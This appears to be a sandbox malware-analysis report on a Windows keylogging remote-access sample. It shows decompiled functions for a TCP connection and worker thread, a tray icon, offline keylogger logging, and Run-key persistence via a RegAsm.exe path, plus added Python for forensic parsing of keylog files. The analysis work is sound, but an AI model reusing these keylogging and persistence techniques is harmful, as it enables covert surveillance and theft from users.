                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: dd4241b6f18d58bf00a5beda7eae8558aaf4a1e159d760b7b3d5e3117157614c
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: dd4241b6f18d58bf00a5beda7eae8558aaf4a1e159d760b7b3d5e3117157614c
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                   			// Resolves GetSystemTimes from kernel32.dll at run time (the pointer is
                                   			// called without a NULL check), samples it twice one second apart and
                                   			// returns the CPU utilisation (dkernel + duser - didle) * 100 / (dkernel + duser)
                                   			// as a 64-bit value: the sbb/adc pairs are the high halves of those 64-bit
                                   			// subtractions and the routine ends with a __aulldiv division (ref 004123E4).
                                   			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v44;
                                  				char _v52;
                                  				char _v60;
                                  				char _v68;
                                  				char _v76;
                                  				char _v84;
                                  				void* _t39;
                                  				void* _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t54;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t59;
                                  
                                  				_t56 = __edx;
                                  				_t54 = __ecx;
                                  				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                                  				 *_t59( &_v44,  &_v60,  &_v76);
                                  				Sleep(0x3e8);
                                  				 *_t59( &_v52,  &_v68,  &_v84);
                                  				_v28 = E004123EE(_t54,  &_v44);
                                  				_v24 = _t56;
                                  				_v20 = E004123EE(_t54,  &_v52);
                                  				_v16 = _t56;
                                  				_t39 = E004123EE(_t54,  &_v60);
                                  				_v32 = _t56;
                                  				_t41 = E004123EE(_t54,  &_v68);
                                  				_v12 = E004123EE(_t54,  &_v76);
                                  				asm("sbb edi, [ebp-0x1c]");
                                  				_v8 = _t56;
                                  				_v32 = _t56;
                                  				_t45 = E004123EE(_t54,  &_v84);
                                  				asm("sbb edi, [ebp-0x4]");
                                  				asm("sbb ecx, [ebp-0xc]");
                                  				asm("adc ecx, [ebp-0x1c]");
                                  				asm("adc ecx, [ebp-0x14]");
                                  				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
                                  				asm("adc edi, [ebp-0x1c]");
                                  				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
                                   			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                  • __aulldiv.LIBCMT ref: 004123E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID: GetSystemTimes$kernel32.dll
                                  • API String ID: 482274533-1354958348
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%
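E0041230A resolves GetSystemTimes at run time, takes two snapshots one second apart (Sleep(0x3e8)) and reduces the six FILETIMEs to a CPU-utilisation percentage; the sbb/adc pairs are the 64-bit subtractions and __aulldiv is the final division. The Python below is an added example that reimplements that arithmetic for analysts who want to check what the sample reports; it is not code from the sample or from this report. The snapshot values are constructed and the two-CPU host they imply is imaginary.

```python
"""CPU-utilisation arithmetic of E0041230A, reimplemented for analysis.
Added example; the FILETIME snapshots below are constructed."""

from typing import NamedTuple


class FileTime(NamedTuple):
    """A Windows FILETIME as the (low, high) DWORD pair GetSystemTimes
    writes, in 100 ns ticks. The sample's helper E004123EE does the same
    combine and returns the 64-bit value in edx:eax."""
    low: int
    high: int

    def to_u64(self) -> int:
        return ((self.high & 0xFFFFFFFF) << 32) | (self.low & 0xFFFFFFFF)


class SystemTimes(NamedTuple):
    """One GetSystemTimes snapshot. On Windows the kernel time already
    includes idle time, which is why idle is subtracted from kernel+user."""
    idle: FileTime
    kernel: FileTime
    user: FileTime


def ticks(value: int) -> FileTime:
    """Split a 64-bit tick count into the (low, high) DWORD pair."""
    return FileTime(value & 0xFFFFFFFF, (value >> 32) & 0xFFFFFFFF)


def cpu_usage_percent(first: SystemTimes, second: SystemTimes) -> int:
    """(dkernel + duser - didle) * 100 / (dkernel + duser): the computation
    the sbb/adc chain and the final __aulldiv in E0041230A perform."""
    d_idle = second.idle.to_u64() - first.idle.to_u64()
    d_kernel = second.kernel.to_u64() - first.kernel.to_u64()
    d_user = second.user.to_u64() - first.user.to_u64()
    total = d_kernel + d_user
    if total == 0:
        # The sample has no guard here: two identical snapshots would make
        # __aulldiv divide by zero. Report 0% instead.
        return 0
    busy = total - d_idle
    return (busy * 100) // total


# Constructed snapshots one second apart, as after the sample's Sleep(0x3e8).
# The absolute values exceed 2**32 so the high DWORD path is exercised. On
# this imaginary 2-CPU host, 2 s of kernel+user time pass per wall-clock second.
SECOND = 10_000_000  # FILETIME ticks per second
SNAPSHOT_1 = SystemTimes(idle=ticks(4000 * SECOND),
                         kernel=ticks(5000 * SECOND),
                         user=ticks(1500 * SECOND))
SNAPSHOT_2 = SystemTimes(idle=ticks(4000 * SECOND + 15_000_000),
                         kernel=ticks(5000 * SECOND + 18_000_000),
                         user=ticks(1500 * SECOND + 2_000_000))

if __name__ == "__main__":
    print(f"CPU usage as the sample computes it: "
          f"{cpu_usage_percent(SNAPSHOT_1, SNAPSHOT_2)}%")
```

With the constructed snapshots the routine yields 25%. The only guard the reimplementation adds is for a zero denominator; the sample has neither that nor a NULL check on the GetProcAddress result.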

                                  C-Code - Quality: 24%
                                   			// Opens a TCP connection (E00402038: socket(SOCK_STREAM, IPPROTO_TCP);
                                   			// E0040209B: connect), concatenates the argument string with a string
                                   			// derived from the service control manager (E004113C9: OpenSCManagerA),
                                   			// then starts a worker thread through E00402118 (CreateThread, start
                                   			// routine 00402137), passing E00410F04.
                                   			E00410E53(void* __eflags, char _a4) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				void* _t16;
                                  				char* _t18;
                                  				void* _t19;
                                  				void* _t36;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                  				E00402038(0x41c130);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				E0040209B(0x41c130,  &_a4);
                                  				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
                                  				_t18 =  &_v20;
                                  				L00414140();
                                  				L00414140();
                                  				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				E00402118(0x41c130, E00410F04);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t19;
                                   			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: 86e22a700adb0c7821cfbfe26678e24a00dc881542be09655b9efe58bdae1695
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: 86e22a700adb0c7821cfbfe26678e24a00dc881542be09655b9efe58bdae1695
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                   			// Builds a std::basic_string<wchar_t> from a narrow std::string: allocates
                                   			// (length + 2) * 2 zero-filled bytes with operator new, copies the narrow
                                   			// bytes in, constructs the wide string from that buffer (the ??0 calls),
                                   			// frees the buffer with operator delete and returns _a4. The decompiler
                                   			// rendered the rep movs block copies as the paired memset/memcpy calls.
                                   			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                  				char _v20;
                                  				void* _t15;
                                  				void* _t18;
                                  				signed int _t20;
                                  				void* _t25;
                                  				signed int _t28;
                                  				signed int _t29;
                                  				signed int _t36;
                                  				void* _t46;
                                  				signed int _t57;
                                  				void* _t58;
                                  
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t57 = __eax + 2;
                                  				_t15 = _t57 + _t57;
                                  				L00413E84();
                                  				_t25 = _t15;
                                  				_t28 = _t57;
                                  				_t46 = _t25;
                                  				_t29 = _t28 >> 2;
                                  				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                  				_t6 = _t57 - 2; // 0x0
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                  				_t58 = _t18;
                                  				_t36 = _t6 >> 2;
                                  				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                  				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                  				L00413EBE();
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _a4;
                                   			}

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                   			// Message-pump thread: E00413BC8 registers a window class and creates a
                                   			// window, then a NOTIFYICONDATAA at 0x41c200 (cbSize 0x58, uID 1,
                                   			// uFlags 7 = NIF_MESSAGE|NIF_ICON|NIF_TIP, uCallbackMessage 0x401 =
                                   			// WM_USER+1, hIcon pulled from the sample's own executable with
                                   			// ExtractIconA, tooltip copied from *0x41b160) is added with
                                   			// Shell_NotifyIconA(NIM_ADD), and GetMessage/TranslateMessage/
                                   			// DispatchMessage loop until WM_QUIT.
                                   			E00413B0F() {
                                  				struct tagMSG _v32;
                                  				char _v292;
                                  				int _t15;
                                  
                                  				GetModuleFileNameA(0,  &_v292, 0x104);
                                  				 *0x41c204 = E00413BC8();
                                  				0x41c200->cbSize = 0x58;
                                  				 *0x41c208 = 1;
                                  				 *0x41c210 = 0x401;
                                  				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
                                  				lstrcpynA(0x41c218,  *0x41b160, 0x40);
                                  				 *0x41c20c = 7;
                                  				Shell_NotifyIconA(0, 0x41c200);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push( &_v32);
                                  				while(1) {
                                  					_t15 = GetMessageA();
                                  					if(_t15 == 0) {
                                  						break;
                                  					}
                                  					TranslateMessage( &_v32);
                                  					DispatchMessageA( &_v32);
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push( &_v32);
                                  				}
                                  				return _t15;
                                   			}

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                    • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                    • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                    • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                  • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                  • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                  • GetMessageA.USER32 ref: 00413BA1
                                  • TranslateMessage.USER32(?), ref: 00413BAB
                                  • DispatchMessageA.USER32 ref: 00413BB5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 1970332568-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%
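The listing above shows the offline keylogger's log format: E00405DD3 prefixes each record with GetLocalTime formatted as "[%04i/%02i/%02i %02i:%02i:%02i " followed by further text and "]", and status changes are written as "[INFO]" lines such as "Offline Keylogger Started" and "Offline Keylogger Stopped". The Python below is an added example for rebuilding a timeline from a recovered log; it is not code from the sample or from this report. What the sample puts between the timestamp and the closing bracket is not visible here, so the parser accepts any text in that position (an assumption; the field is called `header` in the code), and the sample log is constructed.

```python
"""Parser for the timestamp-prefixed records of the sample's offline
keylogger. Added example; the log text below is constructed."""

import re
from datetime import datetime
from typing import List, NamedTuple, Tuple


class KeylogEntry(NamedTuple):
    when: datetime
    header: str      # text between the timestamp and ']' (assumed field)
    keystrokes: str  # everything logged until the next bracketed marker


# Record header as E00405DD3 builds it: "[%04i/%02i/%02i %02i:%02i:%02i "
# + text + "]". Status lines are tagged "[INFO]". Either may appear first,
# so both are matched as alternatives of one token pattern.
TOKEN_RE = re.compile(
    r"\[(?P<y>\d{4})/(?P<mo>\d{2})/(?P<d>\d{2}) "
    r"(?P<h>\d{2}):(?P<mi>\d{2}):(?P<s>\d{2}) (?P<hdr>[^\]]*)\]"
    r"|\[INFO\][ \t]*(?P<msg>[^\r\n]*)"
)


def parse_keylog(text: str) -> Tuple[List[KeylogEntry], List[str]]:
    """Split a recovered log into timestamped entries and [INFO] messages.
    Keystrokes run from one marker to the start of the next."""
    entries: List[KeylogEntry] = []
    infos: List[str] = []
    tokens = list(TOKEN_RE.finditer(text))
    for i, m in enumerate(tokens):
        if m.group("msg") is not None:
            infos.append(m.group("msg").strip())
            continue
        try:
            when = datetime(int(m.group("y")), int(m.group("mo")),
                            int(m.group("d")), int(m.group("h")),
                            int(m.group("mi")), int(m.group("s")))
        except ValueError:
            # Corrupted or truncated data: skip the record instead of aborting.
            continue
        end = tokens[i + 1].start() if i + 1 < len(tokens) else len(text)
        entries.append(KeylogEntry(when, m.group("hdr").strip(),
                                   text[m.end():end].strip()))
    return entries, infos


# Constructed log. The [INFO] messages are the strings in the report;
# the window titles and keystrokes are made up.
SAMPLE_LOG = (
    "[INFO] Offline Keylogger Started\r\n"
    "[2020/11/23 09:14:05 Untitled - Notepad]\r\n"
    "hello world\r\n"
    "[2020/11/23 09:15:40 Sign in]\r\n"
    "alice\r\n"
    "[INFO] Offline Keylogger Stopped\r\n"
)

if __name__ == "__main__":
    found, status = parse_keylog(SAMPLE_LOG)
    for e in found:
        print(f"{e.when.isoformat()}  {e.header!r}: {e.keystrokes!r}")
    print("status:", status)
```

Because the closing bracket is the only delimiter visible in the report, a header field that itself contains "]" would truncate the match; treat `header` as best-effort when reviewing output from a real log.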

                                  C-Code - Quality: 28%
                                   			// Registry write helper: RegCreateKeyW(hKey, subKey) with the opened
                                   			// handle stored back into _a8, RegSetValueExW of the UTF-16 string with
                                   			// cbData = length * 2 + 2 (terminating NUL included) under value name
                                   			// _a12 and type _a32, then RegCloseKey; returns 1 on success, 0 otherwise.
                                   			// The listing shows the caller at 00407E26 passing HKEY_LOCAL_MACHINE
                                   			// (0x80000002), Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                   			// and the data C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.
                                   			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
                                  				long _t15;
                                  				long _t18;
                                  				void* _t21;
                                  				int _t22;
                                  				void* _t28;
                                  
                                  				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
                                  				if(_t15 != 0) {
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return 0;
                                  				} else {
                                  					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
                                  					_t17 = _t15 + _t15 + 2;
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t22 = 0;
                                  					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
                                  					RegCloseKey(_a8);
                                  					if(_t18 == 0) {
                                  						_t22 = 1;
                                  					}
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return _t22;
                                  				}
                                   			}

                                  APIs
                                  • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7D5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7E3
                                  • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
